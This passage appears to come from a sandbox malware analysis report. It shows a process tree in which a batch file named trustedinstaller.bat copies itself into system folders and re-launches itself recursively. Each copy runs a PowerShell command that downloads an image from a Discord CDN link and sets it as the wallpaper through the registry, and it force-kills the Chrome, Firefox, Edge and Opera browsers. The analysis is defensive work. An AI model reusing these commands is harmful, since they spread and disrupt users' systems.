      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2496
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1816
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:6756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:5764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:1368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:5676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:524
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1016
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3268
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4304
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4880
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5808
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2384
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:1756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:5860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:2516
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4840
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:5936
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:6136
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "chrome.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "firefox.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "msedge.exe"
    3⤵
    PID:3220
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "opera.exe"
    3⤵
    PID:6052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2152
- - C:\Windows\system32\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
    3⤵
    PID:2152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:404
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2028
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:10000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:4792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:5288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4908
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
    3⤵
    PID:2896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:624
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:6028
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:6848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
    3⤵
    PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2616
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2676
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
    3⤵
    PID:1600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2876
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1896
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:6276
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:6928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:6996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:6256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:544
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6620
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:7104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
    3⤵
    PID:652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:344
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3748
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:9932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:6956
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:4768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4184
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
    3⤵
    PID:2148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:524
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2832
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5932
